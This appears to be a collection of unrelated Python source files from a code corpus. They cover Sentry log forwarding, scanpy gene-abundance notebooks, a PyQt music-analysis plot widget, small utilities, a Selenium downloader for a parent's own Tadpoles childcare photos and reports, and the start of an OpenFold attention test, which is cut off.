print('Using the DSN %s' % args.sentrydsn)
os.environ['SENTRY_DSN'] = args.sentrydsn
if ('SENTRY_DSN' not in os.environ) or (not os.environ['SENTRY_DSN']):
raise SystemExit('No Sentry DSN found!')
if args.nginxerrorpath:
print('Using the Nginx error log path %s' % args.nginxerrorpath)
os.environ['NGINX_ERROR_PATH'] = args.nginxerrorpath
if args.loglevel:
print('Using the sentry log level %s' % args.loglevel)
os.environ['SENTRY_LOG_LEVEL'] = args.loglevel
from ..conf import settings # noqa: F401; pylint: disable=unused-import
if args.daemonize:
print('Running process in background')
from ..daemonize import create_daemon
create_daemon()
def parse_sentry_configuration(filename):
"""Parse Sentry DSN out of an application or Sentry configuration file"""
filetype = os.path.splitext(filename)[-1][1:].lower()
if filetype == 'ini': # Pyramid, Pylons # pylint: disable=no-else-raise
config = ConfigParser()
config.read(filename)
ini_key = 'dsn'
ini_sections = ['sentry', 'filter:raven']
for section in ini_sections:
if section in config:
print('- Using value from [{section}]:[{key}]'
.format(section=section, key=ini_key))
try:
return config[section][ini_key]
except KeyError:
print('- Warning: Key "{key}" not found in section '
'[{section}]'.format(section=section, key=ini_key))
raise SystemExit('No DSN found in {file}. Tried sections [{sec_list}]'
.format(
file=filename,
sec_list='], ['.join(ini_sections),
))
elif filetype == 'py': # Django, Flask, Bottle, ...
raise SystemExit('Parsing configuration from pure Python (Django,'
'Flask, Bottle, etc.) not implemented yet.')
raise SystemExit('Configuration file type not supported for parsing: '
'%s' % filetype)
def launch_log_parsers():
"""Run all log file parsers that send entries to Sentry"""
from ..parsers.nginx import Nginx
for parser in [Nginx]:
parser().follow_tail()
def main():
"""Main entry point of console script"""
args = get_command_line_args()
process_arguments(args)
print('Start sending %s logs to Sentry' % args.follow)
launch_log_parsers()
if __name__ == '__main__':
main()
| 4,328 | 1,254 |
#%%
import scanpy as sc
import pandas as pd
from pathlib import Path
from vectorseq.utils import check_gene_abundance, create_dir
from vectorseq.marker_constants import BrainGenes
data_dir = Path("/spare_volume/vectorseq-data")
figure_save_dir = create_dir(data_dir / "gene_abundance")
#%% [markdown]
# ## Gene Abundance Table for Experiment: 3250, Brain Region: v1
#%%
experiment_id = "3250"
brain_region = "v1"
run_dir = data_dir / experiment_id / brain_region
all_cells_output_dir = create_dir(run_dir / "all_cells")
adata = sc.read_h5ad(all_cells_output_dir / "filter" / "adata.h5ad")
filtered_tg_list = [
gene for gene in BrainGenes.TG_MARKERS if gene.upper() in adata.obs.columns
]
endogenous_genes_list = [
"Snap25",
"Rbfox3",
"Slc17a6",
"Camk2a",
"Gad1",
"Gad2",
"Mog",
"Flt1",
]
gene_list = filtered_tg_list + endogenous_genes_list
count_fractions_df = pd.DataFrame()
for gene in gene_list:
temp = check_gene_abundance(adata, gene_of_interest=gene)
if not temp.empty:
count_fractions_df = count_fractions_df.append(
pd.DataFrame.from_dict(
{
"gene": gene,
"number_of_expressing_cells": temp.shape[0],
"number_of_reads": temp.goi_counts.sum(),
"abundance_in_expressing_cells": f"{round(temp.percent_count_goi.mean(),2)} +/- {round(temp.percent_count_goi.std(),2)}",
},
orient="index",
).T
)
print(f"{gene} detected.")
else:
print(f"{gene} not detected.")
count_fractions_df.set_index(keys="gene", drop=True, inplace=True)
count_fractions_df.to_csv(
figure_save_dir / f"{experiment_id}_{brain_region}_all_cells_gene_abundance.csv"
)
# %%
#%% [markdown]
# ## Gene Abundance Table for Experiment: 3382, Brain Region: snr
#%%
experiment_id = "3382"
brain_region = "snr"
run_dir = data_dir / experiment_id / brain_region
all_cells_output_dir = create_dir(run_dir / "all_cells")
adata = sc.read_h5ad(all_cells_output_dir / "filter" / "adata.h5ad")
filtered_tg_list = [
gene for gene in BrainGenes.TG_MARKERS if gene.upper() in adata.obs.columns
]
endogenous_genes_list = [
"Snap25",
"Rbfox3",
"Slc17a6",
"Camk2a",
"Gad1",
"Gad2",
"Mog",
"Flt1",
]
gene_list = filtered_tg_list + endogenous_genes_list
count_fractions_df = pd.DataFrame()
for gene in gene_list:
temp = check_gene_abundance(adata, gene_of_interest=gene)
if not temp.empty:
count_fractions_df = count_fractions_df.append(
pd.DataFrame.from_dict(
{
"gene": gene,
"number_of_expressing_cells": temp.shape[0],
"number_of_reads": temp.goi_counts.sum(),
"abundance_in_expressing_cells": f"{round(temp.percent_count_goi.mean(),2)} +/- {round(temp.percent_count_goi.std(),2)}",
},
orient="index",
).T
)
print(f"{gene} detected.")
else:
print(f"{gene} not detected.")
count_fractions_df.set_index(keys="gene", drop=True, inplace=True)
count_fractions_df.to_csv(
figure_save_dir / f"{experiment_id}_{brain_region}_all_cells_gene_abundance.csv"
)
# %%
#%% [markdown]
# ## Gene Abundance Table for Experiment: 3454, Brain Region: sc
#%%
data_dir = Path("/spare_volume/vectorseq-data")
experiment_id = "3454"
brain_region = "sc"
run_dir = data_dir / experiment_id / brain_region
all_cells_output_dir = create_dir(run_dir / "all_cells")
adata = sc.read_h5ad(all_cells_output_dir / "filter" / "adata.h5ad")
filtered_tg_list = [
gene for gene in BrainGenes.TG_MARKERS if gene.upper() in adata.obs.columns
]
endogenous_genes_list = [
"Snap25",
"Rbfox3",
"Slc17a6",
"Camk2a",
"Gad1",
"Gad2",
"Mog",
"Flt1",
]
gene_list = filtered_tg_list + endogenous_genes_list
count_fractions_df = pd.DataFrame()
for gene in gene_list:
temp = check_gene_abundance(adata, gene_of_interest=gene)
if not temp.empty:
count_fractions_df = count_fractions_df.append(
pd.DataFrame.from_dict(
{
"gene": gene,
"number_of_expressing_cells": temp.shape[0],
"number_of_reads": temp.goi_counts.sum(),
"abundance_in_expressing_cells": f"{round(temp.percent_count_goi.mean(),2)} +/- {round(temp.percent_count_goi.std(),2)}",
},
orient="index",
).T
)
print(f"{gene} detected.")
else:
print(f"{gene} not detected.")
count_fractions_df.set_index(keys="gene", drop=True, inplace=True)
count_fractions_df.to_csv(
figure_save_dir / f"{experiment_id}_{brain_region}_all_cells_gene_abundance.csv"
)
#%%
| 4,834 | 1,845 |
from PyQt5 import QtWidgets, QtCore
from matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas
from matplotlib.figure import Figure
from matplotlib import rcParams
rcParams['font.family'] = 'sans-serif'
rcParams['font.sans-serif'] = ['Cantarell']
import matplotlib.pyplot as plt
import matplotlib.patches as mpatch
import numpy as np
import operator
import matplotlib.patheffects as path_effects
class CalmaPlot(FigureCanvas):
"""
This class provides functionality for providing graphical representations of CALMA data.
"""
def __init__(self, width, height, dpi, hasCalma, parent=None):
"""
Constructs an instance of the CALMA graphing class.
An instance of CalmaPlot inherits FigureClass, a MatPlotLib class for displaying plots in the
text of a PyQt5 application. It generates a figure (upon which we may draw), as well as a canvas to
place the figure upon.
Parameters
----------
weight : int
The width of the figure to be created.
height : int
The height of the figure to be created.
dpi : int
The dots-per-inch for the figure typically 100.
"""
# Create Figure instance (which stores our plots)
self.fig = Figure(figsize=(2, 2), dpi=dpi, edgecolor='blue')
# Add an initial plot to our figure
self.canvasGraph = self.fig.add_subplot(111)
# Fetch colour map
self.colourMap = self.get_colour_map()
# Initialize figure canvas, which initializes an instance of QtWidget
FigureCanvas.__init__(self, self.fig)
self.setParent(parent)
# Store reference to axes
self.ax = self.fig.gca()
# Hide tick labels to create default style
self.ax.set_yticklabels([])
self.ax.set_xticklabels([])
# Add placeholder text
if hasCalma:
self.placeHolderText = self.fig.text(0.5, 0.65,'Click on a performance track for CALMA data',horizontalalignment='center',
verticalalignment='center', fontsize=16)
else:
self.placeHolderText = self.fig.text(0.5, 0.65,'No CALMA data available for this query',horizontalalignment='center',
verticalalignment='center',
fontsize=16)
# Make background transparent
self.fig.patch.set_alpha(1.0)
# Resize with window
FigureCanvas.setSizePolicy(self, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)
FigureCanvas.updateGeometry(self)
self.setMinimumSize(self.size())
def get_segment_colour_map(self, features):
"""
Generates a colour map for segment features.
Parameters
----------
features : float[]
Features information.
Returns
----------
newColourMap : str[]
Colour map for each segment type.
"""
hashList = {'1' : 'Grey',
'2':'Red',
'3':'Green',
'4':'greenyellow',
'5':'Pink',
'6':'Orange',
'7':'goldenrod',
'8':'indianred',
'9':'peachpuff',
'10':'deepskyblue',
'11':'firebrick',
'12':'orchid',
'13': 'moccasin',
'14':'slateblue',
'15':'turquoise',
'16':'tomato',
'17':'darkmagenta',
'18':'olivedrab'}
return hashList
def plot_calma_data(self, loudnessValues, features, duration, type, **kwargs):
"""
Takes CALMA data for a single track as input, and creates a plot.
Parameters
----------
loudnessValues : float[]
An array of loudness / amplitude values.
features : float[]
Features information.
duration : float
The duration of the track.
"""
# Replace colour map if needed
if type == 'segment' : self.colourMap = self.get_segment_colour_map(features)
if type == 'key' : self.colourMap = self.get_colour_map()
# Hide placeholder text if visible
try:
self.placeHolderText.remove()
text = self.fig.text(0.5, 0.65, kwargs['title'], horizontalalignment='center',
verticalalignment='center', fontsize=16)
text.set_path_effects([path_effects.Stroke(linewidth=2, foreground='white'),
path_effects.Normal()])
except (KeyError, ValueError) as v:
self.placeHolderText.set_text('')
# Perform pre-processing
nploudnessValues, duration, xSpaced, average = self.pre_processing(loudnessValues, duration)
# Plot waveform
self.canvasGraph.axes.cla()
self.canvasGraph.plot(xSpaced, nploudnessValues)
for index, key in enumerate(features):
# Calculate graph positions
lx, ly, rec = self.calculate_graph_element_position(features, key, index, duration, average)
# Add annotation to plot
self.canvasGraph.annotate(key[1], (lx, ly), weight='bold', color='Black',
fontsize=7, ha='center', va='center', rotation=270)
self.ax.add_artist(rec)
# Set axes labels
self.ax.set_yticklabels([])
self.ax.set_xlabel("Time (seconds)")
# Add colour legend for keys
keysAsSet = list(set([x[1] for x in features]))
patches = []
for k in keysAsSet:
# Plot rectangle for key changes
try:
fc = self.colourMap[k]
except KeyError as keyerr:
fc = 'grey'
patch = mpatch.Patch(color=fc, label=k)
patches.append(patch)
self.canvasGraph.legend(handles=patches, bbox_to_anchor=(1.00, 1), loc=2, borderaxespad=0, fontsize=7, ncol=2)
self.fig.subplots_adjust(left=0.00, right=0.85, top=0.95)
try:
kwargs['release']
except KeyError as v:
# Causes crash with multiple plots
self.finishDraw()
self.fig.patch.set_alpha(1.0)
return
def calculate_graph_element_position(self, keyInfo, key, index, duration, average):
"""
Calculates the position of the rectangular patch, relative to the event duration.
Parameters
----------
keyInfo : String[]
Track meta-data such as label.
key : float[]
Features information.
index : int
Index in the keys we are processing.
duration : float
The duration of the track.
average : float
Average signal amplitude value of the track.
Return
----------
ly : int
The y position of the patch.
lx : int
The x position of the patch.
rec : Rectangular
A rectangular patch object.
"""
# Rectangle takes (lowerleftpoint=(X, Y), width, height)
xy = (float(key[0]), self.ax.get_ylim()[1])
# If not the latest element in the key-change data
if index < len(keyInfo) - 1:
# Swap width and height as we are rotating 270 degrees
height = keyInfo[index + 1][0] - keyInfo[index][0]
else:
height = duration - keyInfo[index][0]
width = self.ax.get_ylim()[1]
angle = 270
# Plot rectangle for key changes
try:
fc = self.colourMap[key[1]]
except KeyError as k:
fc = 'grey'
rec = mpatch.Rectangle(xy, width, height, angle=angle, alpha=0.5, fc=fc)
# Calculate label positions
rx, ry = rec.get_xy()
lx = rx + rec.get_height() / 2.0
ly = average
return lx, ly, rec
def get_colour_map(self):
"""
Returns a colour map for key changes to ensure consistent patterns across CALMA plots.
"""
try:
return {'C# minor' : 'Grey', 'A major' : 'Red', 'D minor' : 'Green',
'Eb Purple': 'greenyellow', 'D major' : 'Pink', 'G major' : 'Orange',
'G minor': 'goldenrod', 'A minor' : 'indianred', 'C minor' : 'peachpuff',
'B minor' : 'deepskyblue', 'Ab Major' : 'firebrick', 'Eb / D# minor' : 'orchid',
'Ab major' : 'moccasin', 'G# minor' : 'slateblue', 'Eb major' : 'turquoise',
'C major' : 'tomato', 'B major' : 'darkmagenta', 'F major' : 'olivedrab',
'F minor' : 'olive', 'Bb major' : 'lightsteelblue', 'Db major' : 'plum',
'Bb minor' : 'mediumspringgreen', 'E minor' : 'lightsalmon',
'F# / Gb major' : 'gold', 'F# minor' : 'burlywood'}
# If colour not found to match, return grey as a last resort
except KeyError as e:
print('Unmatched colour: {0}'.format(e))
return 'Grey'
def pre_processing(self, loudnessValues, duration):
# Clip
loudnessValues = loudnessValues[100:-50]
nploudnessValues = np.array(loudnessValues)
# Frame-rate is the number of values provided, divided by the duration
frame_rate = len(nploudnessValues) / duration
# Calculate average for placing labels on Y-AXIS
average = sum(loudnessValues) / len(loudnessValues)
# Generate linear spacing for seconds in X-AXIS
xSpaced = np.linspace(0, len(loudnessValues) / frame_rate, num=len(loudnessValues))
return nploudnessValues, duration, xSpaced, average
def finishDraw(self):
self.fig.canvas.draw_idle() | 9,102 | 2,870 |
from framework.core.template_handlers import env, render_template
def not_found_view(request, **kwargs):
return 'Page not found :('
def forbidden_view(request, **kwargs):
context = kwargs.get('context')
template = env.get_template('forbidden.html')
return render_template(template, context=context)
| 319 | 95 |
import pygame
import os
class Speed:
def __init__(self,X):
self.X = X
self.Y = 700
self.image = pygame.image.load(os.path.join("img/speed_power_up.png"))
self.image = pygame.transform.scale(self.image, (55, 55))
def update_and_draw(self,screen):
screen.blit(self.image, (self.X, self.Y)) | 358 | 139 |
import tensorflow as tf
def resize_bilinear(x, shape):
"""
Raises a warning if tensorflow version is too in order to buggy behavior
References
----------
[1]: https://github.com/tensorflow/tensorflow/issues/6720
[2]: https://github.com/tensorflow/tensorflow/issues/33691
"""
tf_version = tf.__version__
major_version, minor_version, _ = tf_version.split(".")
version = int(major_version) * 100 + int(minor_version)
if version < 114: # 1.14
raise NotImplementedError(
"Resize bilinear is buggy for tensorflow version below 1.14"
)
elif version >= 114 and version < 115: # 114
return tf.image.resize_bilinear(x, shape, align_corners=True)
elif version >= 115:
return tf.image.resize_bilinear(x, shape, align_corners=True)
| 821 | 281 |
# coding: utf-8
import time
import random
import logging
from celery import Task
from banal import ensure_list
from normality import stringify
from pkg_resources import iter_entry_points
log = logging.getLogger(__name__)
EXTENSIONS = {}
def get_extensions(section):
if section not in EXTENSIONS:
EXTENSIONS[section] = {}
if not EXTENSIONS[section]:
for ep in iter_entry_points(section):
EXTENSIONS[section][ep.name] = ep.load()
return list(EXTENSIONS[section].values())
def dict_list(data, *keys):
"""Get an entry as a list from a dict. Provide a fallback key."""
for key in keys:
if key in data:
return ensure_list(data[key])
return []
def backoff(failures=0):
failures = min(7, failures)
sleep = 2 ** (failures + random.random())
log.debug("Back-off: %.2fs", sleep)
time.sleep(sleep)
def html_link(text, link):
text = text or '[untitled]'
if link is None:
return "<span class='reference'>%s</span>" % text
return "<a class='reference' href='%s'>%s</a>" % (link, text)
def anonymize_email(name, email):
"""Generate a simple label with both the name and email of a user."""
name = stringify(name)
email = stringify(email)
if email is None:
return name
if '@' in email:
mailbox, domain = email.rsplit('@', 1)
if len(mailbox):
repl = '*' * (len(mailbox) - 1)
mailbox = mailbox[0] + repl
email = '%s@%s' % (mailbox, domain)
if name is None:
return email
return '%s <%s>' % (name, email)
class SessionTask(Task):
def on_failure(self, exc, task_id, args, kwargs, einfo):
from aleph.core import db
db.session.remove()
| 1,746 | 579 |
#!/usr/bin/env python
"""
psola.utilities.find
Implements a function that sort-of works like MATLAB's find
This is preferable to importing `find' from pylab, IMO
Author: jreinhold
Created on: Aug 18, 2017
"""
import numpy as np
def find(x):
"""
kind-of mimics the find command in matlab,
really created to avoid repetition in code
Args:
x (numpy mask): condition, e.g., x < 5
Returns:
indices where x is true
"""
return np.squeeze(np.where(x))
| 495 | 176 |
"""This module downloads all photos/videos from tadpole to a local folder."""
import os
from os.path import abspath, dirname, join, isfile, isdir
import re
import sys
import json
import time
import pickle
import logging
import logging.config
from random import randrange
from getpass import getpass
from configparser import ConfigParser
from selenium import webdriver
from selenium.webdriver.common.action_chains import ActionChains
from selenium.common.exceptions import NoSuchElementException
import requests
class DownloadError(Exception):
"""An exception indicating some errors during downloading"""
pass
class Image(object):
url_re = re.compile('\\("([^"]+)')
url_search = lambda div: Image.url_re.search(div.get_attribute("style"))
def __init__(self, div, date=None):
self.div = div
# Extract URL from div
_url = Image.url_search(div).group(1)
_url = _url.replace('thumbnail=true', '')
_url = _url.replace('&thumbnail=true', '')
self.url = 'https://www.tadpoles.com' + _url
# Extract id from div
# Shorten _id to avoid OS file length limit
# TODO more robust id algorithm
_id = div.get_attribute('id').split('-')[1]
_id = _id[int(len(_id)/2):]
self.id = _id
# Save date (defaults to None)
self.date = date
# Get key (for downloading)
_, self.key = self.url.split("key=")
@property
def date_text(self):
return "{:02d}".format(self.date if self.date is not None else 1)
class Report(object):
def __init__(self, div):
self.div = div
self.display_text = div.get_attribute('outerText')
date = int(self.display_text.split('\n')[1].split('/')[1])
self.date_text = "{:02d}".format(date)
class Client:
"""The main client class responsible for downloading pictures/videos"""
COOKIE_FILE = "cookies.pkl"
ROOT_URL = "http://www.tadpoles.com/parents"
HOME_URL = "https://www.tadpoles.com/parents"
CONFIG_FILE_NAME = "conf.json"
MIN_SLEEP = 1
MAX_SLEEP = 3
MONTHS = ['jan', 'feb', 'mar', 'apr', 'may', 'jun', 'jul', 'aug', 'sep', 'oct', 'nov', 'dec']
def __init__(self, config, download_reports=True):
self.init_logging()
self.browser = None
self.cookies = None
self.req_cookies = None
self.__current_month__ = None
self.__current_year__ = None
self.current_child = None
self.download_reports = download_reports
self.config = config
# e.g. {'jan':'01', 'feb':'02', ...}
self.month_lookup = {month: "{:02d}".format(Client.MONTHS.index(month)+1) for month in Client.MONTHS}
def config_login_info(self):
return self.config['AUTHENTICATION']
def config_requests_info(self):
return self.config['DOWNLOADS']
def init_logging(self):
"""Set up logging configuration"""
# Create logging dir
directory = dirname('logs/')
if not isdir(directory):
os.makedirs(directory)
logging_config = dict(
version=1,
formatters={
'f': {
'format': '%(asctime)s %(name)-12s %(levelname)-8s %(message)s'}
},
handlers={
'h': {
'class': 'logging.StreamHandler',
'formatter': 'f',
'level': logging.DEBUG
},
'f': {
'class': 'logging.FileHandler',
'formatter': 'f',
'filename': 'logs/tadpole.log',
'level': logging.INFO}
},
root={
'handlers': ['h', 'f'],
'level': logging.DEBUG,
},
)
logging.config.dictConfig(logging_config)
self.logger = logging.getLogger('tadpole-catcher')
def __enter__(self):
self.logger.info("Starting browser")
self.browser = webdriver.Chrome()
self.browser.implicitly_wait(10)
self.logger.info("Got a browser")
return self
def __exit__(self, *args):
self.logger.info("Shutting down browser")
self.browser.quit()
def sleep(self, minsleep=None, maxsleep=None):
"""Sleep a random amount of time bound by the min and max value"""
_min = minsleep or self.MIN_SLEEP
_max = maxsleep or self.MAX_SLEEP
duration = randrange(_min * 100, _max * 100) / 100.0
self.logger.info('Sleeping %r', duration)
time.sleep(duration)
def navigate_url(self, url):
"""Force the browser to go a url"""
self.logger.info("Navigating to %r", url)
self.browser.get(url)
def load_cookies(self):
"""Load cookies from a previously saved ones"""
self.logger.info("Loading cookies.")
with open(self.COOKIE_FILE, "rb") as file:
self.cookies = pickle.load(file)
def dump_cookies(self):
"""Save cookies of the existing session to a file"""
self.logger.info("Dumping cookies.")
self.cookies = self.browser.get_cookies()
with open(self.COOKIE_FILE, "wb") as file:
pickle.dump(self.browser.get_cookies(), file)
def add_cookies_to_browser(self):
"""Load the saved cookies into the browser"""
self.logger.info("Adding the cookies to the browser.")
for cookie in self.cookies:
if self.browser.current_url.strip('/').endswith(cookie['domain']):
self.browser.add_cookie(cookie)
def requestify_cookies(self):
"""Transform the cookies to what the request lib requires."""
self.logger.info("Transforming the cookies for requests lib.")
self.req_cookies = {}
for s_cookie in self.cookies:
self.req_cookies[s_cookie["name"]] = s_cookie["value"]
def switch_windows(self):
'''Switch to the other window.'''
self.logger.info("Switching windows.")
all_windows = set(self.browser.window_handles)
current_window = set([self.browser.current_window_handle])
other_window = (all_windows - current_window).pop()
self.browser.switch_to.window(other_window)
def get_current_child(self):
return self.get_children_params()[self.current_child_ind]
def get_child_name(self):
display_name = self.get_current_child()['display_name']
return display_name.split(' ')[0]
def get_num_children(self):
return len(self.get_children_params())
def get_children_params(self):
#tadpoles does not provide the children attribute if there is only one child
if 'children' in self.app_params:
return self.app_params['children']
else:
#if there is only one child, provide default parameters
return [{'display_name': 'child'}]
def has_next_child(self):
return self.current_child_ind+1 < self.get_num_children()
# add 1 to current child index, and reset to 0 if too many
def next_child(self):
if self.has_next_child():
self.current_child_ind+=1
else:
self.current_child_ind=0
def do_login(self):
"""Perform login to tadpole (without Google SSO)"""
self.logger.info("Navigating to login page.")
self.browser.find_element_by_id("login-button").click()
self.browser.find_element_by_class_name("tp-block-half").click()
self.browser.find_element_by_class_name("other-login-button").click()
# Get email, password, and submit elements
form = self.browser.find_element_by_class_name("form-horizontal")
email_form = self.find_by_xpath('//input[@type="text"]', 'Email field', form)
pwd_form = self.find_by_xpath('//input[@type="password"]', 'Password field', form)
submit = self.find_by_xpath('//button[@type="submit"]', 'Submit button', form)
# Fill out info and submit
email = self.config_login_info()['username']
pwd = self.config_login_info()['password']
if email is '' or pwd is '':
self.logger.info("'settings.ini' does not contain authentication information. Falling back to user-inputted values.")
email = input("Enter email: ")
pwd = input("Enter password: ")
email_form.send_keys(email)
pwd_form.send_keys(pwd)
self.logger.info("Clicking 'submit' button.")
submit.click()
self.logger.info("Sleeping 2 seconds.")
self.sleep(minsleep=2)
def iter_monthyear(self):
'''Yields pairs of xpaths for each year/month tile on the
right hand side of the user's home page.
'''
month_xpath_tmpl = '//*[@id="app"]/div[3]/div[1]/ul/li[%d]/div/div/div/div/span[%d]'
month_index = 1
while True:
month_xpath = month_xpath_tmpl % (month_index, 1)
year_xpath = month_xpath_tmpl % (month_index, 2)
# Go home if not there already.
if self.browser.current_url != self.HOME_URL:
self.navigate_url(self.HOME_URL)
# Find the next month and year elements.
month = self.find_by_xpath(month_xpath, "any more months")
year = self.find_by_xpath(year_xpath, "any more years")
self.__current_month__ = month
self.__current_year__ = year
yield month
month_index += 1
def iter_urls(self):
'''Find all the image urls on the current page.
'''
if self.download_reports:
# Click the "All" button, so reports are included in our iterator
self.sleep(1, 3) # Ensure page is loaded
self.logger.info("Clicking 'All' button to load reports")
all_btn = self.find_by_xpath('//*[@id="app"]/div[3]/div[2]/div[1]/div[2]/ul/li[1]', "'All' button on the Timeline")
all_btn.click()
# For each month on the dashboard...
for month in self.iter_monthyear():
# Navigate to the next month.
month.click()
self.logger.info("Getting urls for month: %s", month.text)
self.sleep(minsleep=5, maxsleep=7)
# For each child...
for child in range(self.get_num_children()):
# Click on child if needed
if(self.get_num_children() > 1):
self.logger.info("Clicking on %s's page", self.get_child_name())
#0 ->2nd li, 1->3rd li, etc.
cur_child_xpath = '//*[@id="app"]/div[2]/div[3]/ul/li[%s]/li/div' % str(self.current_child_ind+2)
current_child = self.find_by_xpath(cur_child_xpath, "link to %s's page" % self.get_child_name())
# click events are only activated on mouseover
chain = ActionChains(self.browser).move_to_element_with_offset(current_child, 5, 5).click()
chain.perform()
# Bools to correctly identify reports and images
report = lambda div: (not Image.url_search(div)) and ('report' in div.get_attribute('outerText'))
image = lambda div: Image.url_search(div) and ('thumbnail' in Image.url_search(div).group(1))
elements = self.browser.find_elements_by_xpath('//div[@class="well left-panel pull-left"]/ul/li/div')
# Collect media files until we see a report
# Once we see a report, apply that date to all seen media files
# Yield processed media files, and then the report
# Deal with edge case where no report is found
media_buffer = []
for div in elements:
if image(div):
img = Image(div=div)
media_buffer.append(img)
elif report(div):
_report = Report(div=div)
# Apply date to all elements in buffer
date_text = _report.date_text
for img in media_buffer:
img.date = int(date_text)
# For each image/video, pop from buffer and yield
while len(media_buffer) > 0:
yield media_buffer.pop()
# Once images are processed, yield report div
yield _report
# Handle edge case where there are media files but no report
while len(media_buffer) > 0:
yield media_buffer.pop()
# Goto next child, if possible
self.next_child()
def save_report(self, report):
'''Save a report given the appropriate div.
'''
# Make file name
child_text = self.get_child_name().lower()
year_text = self.__current_year__.text
month_text = self.month_lookup[self.__current_month__.text]
date_text = report.date_text
filename_parts = ['download', child_text, year_text, month_text, 'tadpoles-{}-{}-{}-{}.{}']
filename_report = abspath(join(*filename_parts).format(child_text, year_text, month_text, date_text, 'html'))
# Only download if the file doesn't already exist.
if isfile(filename_report):
self.logger.info("Already downloaded report: %s", filename_report)
return
# Make sure the parent dir exists.
directory = dirname(filename_report)
if not isdir(directory):
os.makedirs(directory)
self.logger.info("Downloading report: %s", filename_report)
div = report.div
# Click on div
div.click()
self.sleep(1, 2) # Wait to load
# Extract body
body = self.browser.find_element_by_class_name('modal-overflow-wrapper')
text = body.get_attribute('innerHTML')
# Close pop-up
x = self.find_by_xpath('//*[@id="dr-modal-printable"]/div[1]/i', 'Close Popup Button')
x.click()
# Wait to load
self.sleep(1, 2)
with open(filename_report, 'w', encoding='UTF-8') as report_file:
self.logger.info("Saving: %s", filename_report)
report_file.write("<html>")
report_file.write(text)
report_file.write("</html>")
self.logger.info("Finished saving: %s", filename_report)
def save_image(self, img):
'''Save an image locally using requests.
'''
url = img.url
date_text = img.date_text
_id = img.id
key = img.key
year_text = self.__current_year__.text
month_text = self.month_lookup[self.__current_month__.text]
child_text = self.get_child_name().lower()
default_download_dir = self.config_requests_info()['default_download_dir']
# Make the local filename.
filename_parts = [default_download_dir, child_text, year_text, month_text, 'tadpoles-{}-{}-{}-{}-{}.{}']
filename_jpg = abspath(join(*filename_parts).format(child_text, year_text, month_text, date_text, _id, 'jpg'))
# we might even get a png file even though the mime type is jpeg.
filename_png = abspath(join(*filename_parts).format(child_text, year_text, month_text, date_text, _id, 'png'))
# We don't know if we have a video or image yet so create both name
filename_video = abspath(join(*filename_parts).format(child_text, year_text, month_text, date_text, _id, 'mp4'))
# Only download if the file doesn't already exist.
if isfile(filename_jpg):
self.logger.info("Already downloaded image: %s", filename_jpg)
return
if isfile(filename_video):
self.logger.info("Already downloaded video: %s", filename_video)
return
if isfile(filename_png):
self.logger.info("Already downloaded png file: %s", filename_png)
return
self.logger.info("Downloading from: %s", url)
# Make sure the parent dir exists.
directory = dirname(filename_jpg)
if not isdir(directory):
os.makedirs(directory)
# Sleep to avoid bombarding the server
self.sleep(1, 3)
# Download it with requests.
max_retries = int(self.config_requests_info()['max_retries'])
retries = 0
while retries < max_retries:
resp = requests.get(url, cookies=self.req_cookies, stream=True)
if resp.status_code == 200:
file = None
try:
content_type = resp.headers['content-type']
self.logger.info("Content Type: %s.", content_type)
if content_type == 'image/jpeg':
filename = filename_jpg
elif content_type == 'image/png':
filename = filename_png
elif content_type == 'video/mp4':
filename = filename_video
else:
self.logger.warning("Unsupported content type: %s", content_type)
return
for chunk in resp.iter_content(1024):
if file is None:
self.logger.info("Saving: %s", filename)
file = open(filename, 'wb')
file.write(chunk)
self.logger.info("Finished saving %s", filename)
finally:
if file is not None:
file.close()
break
else:
msg = 'Error downloading %r. Retrying. Response:'+str(resp)
retries += 1
self.logger.warning(msg, url)
self.sleep(1, 5)
def download_images(self):
'''Login to tadpoles.com and download all user's images.
'''
self.navigate_url(self.ROOT_URL)
self.do_login()
self.dump_cookies()
self.add_cookies_to_browser()
self.requestify_cookies()
# Get application parameters
self.app_params = self.browser.execute_script("return tadpoles.appParams")
self.logger.info("Loaded Tadpoles parameters")
# start off with child 0 (if more than one exists)
self.current_child_ind = 0
for response in self.iter_urls():
try:
if isinstance(response, Image):
self.save_image(response)
elif isinstance(response, Report):
self.save_report(response)
except DownloadError:
self.logger.exception("Error while saving resource")
except (KeyboardInterrupt):
self.logger.info("Download interrupted by user")
def find_by_xpath(self, selector, name='element', form=None):
'''Find element by xpath, but catch NoSuchElementException to log which XPath is faulty
'''
if form==None:
form = self.browser
try:
el = form.find_element_by_xpath(selector)
except NoSuchElementException:
self.logger.info("Could not find %s using XPath %s. Stopping.", name, selector)
sys.exit(0)
return el
# create a config file if one does not already exist/needs to be reset
def create_config_file(file_name):
cfg = ConfigParser()
cfg['AUTHENTICATION'] = {}
cfg['AUTHENTICATION']['username'] = ''
cfg['AUTHENTICATION']['password'] = ''
cfg['DOWNLOADS'] = {}
cfg['DOWNLOADS']['max_retries'] = '5'
cfg['DOWNLOADS']['default_download_dir'] = 'download'
with open(file_name, 'w') as cfg_file:
cfg.write(cfg_file)
print("New configuration file generated!\n")
print("Please edit 'settings.ini' and input your authentication information before continuing to use this script.\n")
# open an already existing config file (assumes correct items)
def read_config_file(file_name):
cfg = ConfigParser()
cfg.read(file_name)
return cfg
if __name__ == "__main__":
settings = 'settings.ini'
config = None
if isfile(settings):
config = read_config_file(settings)
else:
create_config_file(settings)
input("Press any key to exit.")
exit()
with Client(config) as client:
client.download_images()
| 20,461 | 5,911 |
# Copyright 2021 AlQuraishi Laboratory
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import torch
import numpy as np
import unittest
from openfold.model.primitives import (
Attention,
)
from tests.config import consts
class TestLMA(unittest.TestCase):
def test_lma_vs_attention(self):
batch_size = consts.batch_size
c_hidden = 32
n = 2**12
no_heads = 4
q = torch.rand(batch_size, n, c_hidden).cuda()
kv = torch.rand(batch_size, n, c_hidden).cuda()
bias = [torch.rand(no_heads, 1, n)]
bias = [b.cuda() for b in bias]
gating_fill = torch.rand(c_hidden * no_heads, c_hidden)
o_fill = torch.rand(c_hidden, c_hidden * no_heads)
a = Attention(
c_hidden, c_hidden, c_hidden, c_hidden, no_heads
).cuda()
with torch.no_grad():
